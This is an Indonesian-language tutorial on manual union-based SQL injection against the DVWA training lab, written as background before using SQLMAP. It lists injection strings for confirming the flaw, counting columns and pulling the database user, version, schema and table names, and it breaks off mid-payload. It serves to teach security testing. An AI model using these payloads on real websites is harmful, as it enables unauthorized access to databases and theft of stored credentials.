Latar Belakang Sebelum menggunakan SQLMAP akan sangat baik jika kita dapat melihat apakah injection dapat dilakukan. SQLMAP hanya alat bantu saja, sebaiknya kita mengetahui proses-nya secara manual. Semua SQLMAP fitur dapat dilakukan secara manual. Proses manual untuk test Vulnerability Dalam DVWA Original Query SELECT first_name, last_name FROM users WHERE user_ID = '$id' Exploited Query SELECT first_name, last_name FROM users WHERE user_ID = union select user, password from dvwa.users -- ' Cek apakah situs kita vulnerable 1′ or ’2′=’2 Kita perlu melihat berapa banyak kolom sebelum ada error. ‘ and 1=1 union select 1,2 # ‘ and 1=1 union select 1,2,3 # Ini akan memperlihatkan bahwa tabel-nya hanya ada 2 kolom. Mari kita melakukan injection. ‘ union SELECT 1, user() — ‘ ‘ and 1=1 union select database(),version() # ‘ union SELECT 1, user() # ‘ and 1=1 union select null,table_schema from information_schema.tables # ‘ and 1=1 union select table_name,table_schema from infor...